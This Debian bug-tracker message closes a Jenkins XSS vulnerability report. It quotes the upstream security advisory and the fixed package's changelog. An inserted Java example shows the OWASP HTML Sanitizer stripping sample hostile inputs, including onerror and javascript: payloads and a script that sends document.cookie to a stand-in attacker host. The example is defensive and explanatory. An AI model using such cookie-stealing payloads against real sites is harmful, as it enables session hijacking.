Your message dated Tue, 27 Mar 2012 12:17:48 +0000
with message-id <[email protected]>
and subject line Bug#664057: fixed in jenkins 1.424.6+dfsg-1
has caused the Debian Bug report #664057,
regarding jenkins: XSS security vulnerability
to be marked as done.
This means that you claim that the problem has been dealt with.
If this is not the case it is now your responsibility to reopen the
Bug report if necessary, and/or fix the problem forthwith.
(NB: If you are a system administrator and have no idea what this
message is talking about, this may indicate a serious mail system
misconfiguration somewhere. Please contact [email protected]
immediately.)
--
664057: http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=664057
Debian Bug Tracking System
Contact [email protected] with problems
--- Begin Message ---
Package: jenkins
Version: 1.424.3+dfsg-1
Severity: normal
Tags: upstream
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
https://wiki.jenkins-ci.org/display/SECURITY/Jenkins+Security+Advisory+2012-03-05
This advisory announces a couple of critical security vulnerabilities
that were found in Jenkins core.
The first vulnerability is a directory traversal vulnerability. This allows
an anonymous attacker to read files in the file system that shouldn't be
exposed.
This vulnerability affects Jenkins instances that run on Windows, whether or not the
access control in Jenkins is enabled. Those file reads are still subject to
OS-level access control, and therefore an attacker will only gain access to
files that are readable to the OS user that runs the Jenkins process. This is a
vulnerability in the built-in servlet container (named Winstone), and therefore
the only affected users are those who are running Jenkins via
java -jar jenkins.war (this includes users of the Windows installer.)
This vulnerability affects all versions of Jenkins up to and including 1.452,
and LTS releases up to and including 1.424.3.
The second vulnerability is a cross-site scripting (XSS) vulnerability,
which allows an attacker to inject malicious HTML into pages served by Jenkins.
This allows an attacker to escalate his privileges by hijacking the sessions of
other users. This vulnerability affects all versions of Jenkins up to and
including 1.452, and LTS releases up to and including 1.424.3, regardless
of the security settings.
The Debian package is only impacted by the second vulnerability and requires a
new package, owasp-java-html-sanitizer (see
http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=664055).
This is also being addressed in Ubuntu, which is nearing beta-2 for precise:
https://bugs.launchpad.net/ubuntu/+source/jenkins/+bug/954960
-- System Information:
Debian Release: wheezy/sid
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: amd64 (x86_64)
Kernel: Linux 3.2.0-18-generic (SMP w/8 CPU cores)
Locale: LANG=C, LC_CTYPE=en_GB.UTF-8 (charmap=UTF-8)
Shell: /bin/sh linked to /bin/dash
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.12 (GNU/Linux)
=tKqK
-----END PGP SIGNATURE-----
--- End Message ---
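The advisory above says the XSS fix hinges on routing user-controlled HTML through the OWASP Java HTML Sanitizer (the libowasp-java-html-sanitizer-java dependency the Debian package picks up). The following is an added example, not Jenkins code and not from the Debian package, showing what that library does to the kind of input an attacker would submit: an allowlist policy is built once, and everything outside it (script elements, event-handler attributes, javascript: URLs) is dropped rather than escaped. The class name `DescriptionSanitizer`, the specific allowlist, and the sample inputs are assumptions constructed for the illustration; the API calls (`HtmlPolicyBuilder`, `PolicyFactory.sanitize`) are the library's.

```java
import org.owasp.html.HtmlPolicyBuilder;
import org.owasp.html.PolicyFactory;

// Added example (not Jenkins's own code): an allowlist sanitizer for
// user-supplied HTML such as a job or build description.
public class DescriptionSanitizer {

    // Build the policy once; PolicyFactory is immutable and thread-safe.
    // Only basic block/inline formatting and http(s)/mailto links survive.
    // Unknown elements and attributes are removed, so <script>, onerror=,
    // <iframe>, style= and javascript: hrefs never reach the page.
    private static final PolicyFactory POLICY = new HtmlPolicyBuilder()
            .allowCommonBlockElements()
            .allowCommonInlineFormattingElements()
            .allowElements("a")
            .allowAttributes("href").onElements("a")
            .allowUrlProtocols("http", "https", "mailto")
            .requireRelNofollowOnLinks()
            .toFactory();

    /** Returns a version of {@code untrusted} that is safe to embed as HTML. */
    public static String sanitize(String untrusted) {
        if (untrusted == null) {
            return "";
        }
        return POLICY.sanitize(untrusted);
    }

    public static void main(String[] args) {
        // Constructed sample inputs: one benign, three hostile.
        String[] samples = {
            "<b>Build</b> passed, see <a href=\"https://example.invalid/report\">report</a>",
            "<img src=x onerror=\"alert(document.cookie)\">",
            "<a href=\"javascript:alert(1)\">click me</a>",
            "<script>new Image().src='http://attacker.invalid/?c='+document.cookie</script>",
        };
        for (String s : samples) {
            System.out.println("in : " + s);
            System.out.println("out: " + sanitize(s));
            System.out.println();
        }
    }
}
```

Compile and run with the sanitizer jar (and the Guava jar it depends on) on the classpath. The benign input keeps its `<b>` and its link (with `rel="nofollow"` added); the `onerror` handler, the `javascript:` href and the whole `<script>` element are stripped. The design point is that this is an allowlist over parsed HTML, not a regex blocklist: anything the policy does not name is removed, so new attack vectors need no new rule. Fields that are not supposed to carry HTML at all should still be HTML-escaped on output rather than sanitized.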
--- Begin Message ---
Source: jenkins
Source-Version: 1.424.6+dfsg-1
We believe that the bug you reported is fixed in the latest version of
jenkins, which is due to be installed in the Debian FTP archive:
jenkins-cli_1.424.6+dfsg-1_all.deb
to main/j/jenkins/jenkins-cli_1.424.6+dfsg-1_all.deb
jenkins-common_1.424.6+dfsg-1_all.deb
to main/j/jenkins/jenkins-common_1.424.6+dfsg-1_all.deb
jenkins-external-job-monitor_1.424.6+dfsg-1_all.deb
to main/j/jenkins/jenkins-external-job-monitor_1.424.6+dfsg-1_all.deb
jenkins-slave_1.424.6+dfsg-1_all.deb
to main/j/jenkins/jenkins-slave_1.424.6+dfsg-1_all.deb
jenkins-tomcat_1.424.6+dfsg-1_all.deb
to main/j/jenkins/jenkins-tomcat_1.424.6+dfsg-1_all.deb
jenkins_1.424.6+dfsg-1.debian.tar.gz
to main/j/jenkins/jenkins_1.424.6+dfsg-1.debian.tar.gz
jenkins_1.424.6+dfsg-1.dsc
to main/j/jenkins/jenkins_1.424.6+dfsg-1.dsc
jenkins_1.424.6+dfsg-1_all.deb
to main/j/jenkins/jenkins_1.424.6+dfsg-1_all.deb
jenkins_1.424.6+dfsg.orig.tar.gz
to main/j/jenkins/jenkins_1.424.6+dfsg.orig.tar.gz
libjenkins-java_1.424.6+dfsg-1_all.deb
to main/j/jenkins/libjenkins-java_1.424.6+dfsg-1_all.deb
libjenkins-plugin-parent-java_1.424.6+dfsg-1_all.deb
to main/j/jenkins/libjenkins-plugin-parent-java_1.424.6+dfsg-1_all.deb
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to [email protected],
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
James Page <[email protected]> (supplier of updated jenkins package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing [email protected])
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA256
Format: 1.8
Date: Tue, 27 Mar 2012 09:17:51 +0100
Source: jenkins
Binary: libjenkins-java libjenkins-plugin-parent-java jenkins-common jenkins jenkins-slave jenkins-external-job-monitor jenkins-cli jenkins-tomcat
Architecture: source all
Version: 1.424.6+dfsg-1
Distribution: sid
Urgency: low
Maintainer: Debian Java Maintainers <[email protected]>
Changed-By: James Page <[email protected]>
Description:
jenkins - Continuous Integration and Job Scheduling Server
jenkins-cli - Jenkins CI Command Line Interface
jenkins-common - Jenkins common Java components and web application
jenkins-external-job-monitor - Jenkins CI external job monitoring
jenkins-slave - Jenkins slave node helper
jenkins-tomcat - Jenkins CI on Tomcat 6
libjenkins-java - Jenkins CI core Java libraries
libjenkins-plugin-parent-java - Jenkins Plugin Parent Maven POM
Closes: 664057
Changes:
jenkins (1.424.6+dfsg-1) unstable; urgency=low
.
* New upstream release, fixing XSS security vulnerability (Closes: #664057):
- d/control: Add new dependency on libowasp-java-html-sanitizer-java.
- d/maven.rules: Add new rule to use artifacts
from libowasp-java-html-sanitizer-java.
* Switch upstart configurations to use start-stop-daemon to allow
desktop systems to shutdown.
* d/jenkins-slave.upstart.in: Ensure /var/run/jenkins exists before
trying to download the jenkins slave.jar file to it.
Thanks to Al Stone for providing this fix.
Checksums-Sha1:
ba6791a2b60e8b07a751a9578dbad08723017205 4374 jenkins_1.424.6+dfsg-1.dsc
f2d10efcf5bb7faefcb50bf011b1b3f53a1f96d2 3812074 jenkins_1.424.6+dfsg.orig.tar.gz
f43121a30988acc77d664fe21aa996abdf4fcf19 39504 jenkins_1.424.6+dfsg-1.debian.tar.gz
68456e6f0a09506084817e7978f30bb835ae3761 5522472 libjenkins-java_1.424.6+dfsg-1_all.deb
d51ff5ffcba3dc3f7e1adf9dd863f030a6c0a6d2 13812 libjenkins-plugin-parent-java_1.424.6+dfsg-1_all.deb
218fa1c451e51707b00adbc84ad36467943fe8cc 30756438 jenkins-common_1.424.6+dfsg-1_all.deb
c10d68fbe48e34913e7209afdcbc190ac9a6e8e9 17908 jenkins_1.424.6+dfsg-1_all.deb
8bf81b8a976f812dd343c4370898011eaf9e778b 16972 jenkins-slave_1.424.6+dfsg-1_all.deb
991719b5f5cf0a8d88d46e31424bf05f7b3525d2 5495970 jenkins-external-job-monitor_1.424.6+dfsg-1_all.deb
a89f1b89741f80669c9e976a4d2ecebf91ee2661 545486 jenkins-cli_1.424.6+dfsg-1_all.deb
54219def11a7721925ab710653b9ed61e565d9e7 13998 jenkins-tomcat_1.424.6+dfsg-1_all.deb
Checksums-Sha256:
04d9f6f352325bea6b329bd28392cc1ced0e008183021582e49f6f7574621ad1 4374 jenkins_1.424.6+dfsg-1.dsc
d9effb49adce7814658a552cf46bc12ec40856264a2d145f464799736f8e5d01 3812074 jenkins_1.424.6+dfsg.orig.tar.gz
856de806e075d9945720b004ec4d5c7f5beee769ea248fb09bcc121cafb55ca6 39504 jenkins_1.424.6+dfsg-1.debian.tar.gz
11dae27ae45a26ce77c0e47fc5f388f1ac38e463f7c1cffe385b55d517730fab 5522472 libjenkins-java_1.424.6+dfsg-1_all.deb
89a45ae3c438c7e5fac5e22f1d859b0d1b7b262b6543ffdb0ceb256a83194ca2 13812 libjenkins-plugin-parent-java_1.424.6+dfsg-1_all.deb
15239b86b84bdb20e107b3af028bac8089a51c5d716823fbc6850ee6ef1d50b0 30756438 jenkins-common_1.424.6+dfsg-1_all.deb
316b079d8828bcbde51999009856e461f069f7c237992c9b66cf8516ae9ffd36 17908 jenkins_1.424.6+dfsg-1_all.deb
abde9e59552bc370c893d40dbba8ef288b9c79e1ca0caa8c8c3e61c914824686 16972 jenkins-slave_1.424.6+dfsg-1_all.deb
2660bf84353505f23597329c814819ab2e37f9022219175a1af6f0c6f24bde01 5495970 jenkins-external-job-monitor_1.424.6+dfsg-1_all.deb
01853d98fe4307ff7facc3e2ae1b4618aa1d6667a183783eda33c055aeb63a70 545486 jenkins-cli_1.424.6+dfsg-1_all.deb
a0c9acf1504f710a9157cbe199d8bf7e509a7e68d21ee4bbe5482829ba3b4cff 13998 jenkins-tomcat_1.424.6+dfsg-1_all.deb
Files:
bb71287234e9013f4db7b4c91ff5d9ce 4374 java optional jenkins_1.424.6+dfsg-1.dsc
6e1178315606e58701d28e0d6afaa0a0 3812074 java optional jenkins_1.424.6+dfsg.orig.tar.gz
42f5a45ed3d96faa48c8ea9a1f0409af 39504 java optional jenkins_1.424.6+dfsg-1.debian.tar.gz
3fe574c66cb26e822c6902a8d2e8dede 5522472 java optional libjenkins-java_1.424.6+dfsg-1_all.deb
2aa76824e691e7fb67cd0f267a980b00 13812 java optional libjenkins-plugin-parent-java_1.424.6+dfsg-1_all.deb
3e544ab0f2e09d804e624c4c3805557a 30756438 java optional jenkins-common_1.424.6+dfsg-1_all.deb
f9e2b02661876d4b7abe775bbab01659 17908 java optional jenkins_1.424.6+dfsg-1_all.deb
199b32102dbd0b7784a1591c6ae085d4 16972 java optional jenkins-slave_1.424.6+dfsg-1_all.deb
cea94f39bcab40c65545fcf0ae8d31c6 5495970 java optional jenkins-external-job-monitor_1.424.6+dfsg-1_all.deb
e06ed0bde45ce9d75d7b52737ccae63b 545486 java optional jenkins-cli_1.424.6+dfsg-1_all.deb
bc559694b4dc994d9cb8764dadb28675 13998 java optional jenkins-tomcat_1.424.6+dfsg-1_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (GNU/Linux)
iQIcBAEBCAAGBQJPcaewAAoJEL/srsug59jDoR0P/iLr3SZs4IV7x/h8LtSXEGIu
UVqxmdtpts2tr83Qrj/MIH7CPyStPm1XC8RvY2Jqqr7l3VXG2Qyuy9pqHwlCwKpk
Fs4TBsGayJBixCrzcnhs9iBUA/6WMkJ/jUnrIDyo7ZxjD3d+dvw+7QT5BVzBMRjC
hmgslGeEAEgbovqqLVUHr/dqXPol531eaHJvlm7n1JDIKU2I1RHAZ1/H6SoncWqF
b+zAzRAJa5f4UKCpHip0kVtOjWsWYbHuYeZdqAl/4D2LXE74mGfXy4riv3xuAN1c
tYw7U2CsKElLrRPJvCp4Rn+AYAFPlDPCEPu+XfPamY/5c7+INgs58c8hZIzEXh1F
zEyf1dDdf8Ucc01IliXgkN8FhlOIDqzqvs6Y6LlsjOKGCrmmThrMUqGDZ6NshVPQ
0O+bnPm2JAeUYxVAQz+V0SSngd7iRqjGEXm5SoRouqv0TCumOPdces1HBOdEGsW+
E43FAHgsCDtP4vjFwJQJuHkRtXfUXy9ZJbXkA9vPHpLSBZWgv8o6VGV77QdBUnd5
GlxNVL+UoFkjNxTJCCSvsw0lAj38+QuIJUMq7kFz1D5GzUe046O6B0mch/r31Peq
pSsXACVVxe1mBfaVyN0s35mj1ZAHA5wlcUqLlRb174vIuWSA0+LqXsKwHPm4Il8R
EQMlov0lSk9Xvr3Vdzt6
=yZYE
-----END PGP SIGNATURE-----
--- End Message ---
--
This is the maintainer address of Debian's Java team
<http://lists.alioth.debian.org/cgi-bin/mailman/listinfo/pkg-java-maintainers>.
Please use
[email protected] for discussions and questions.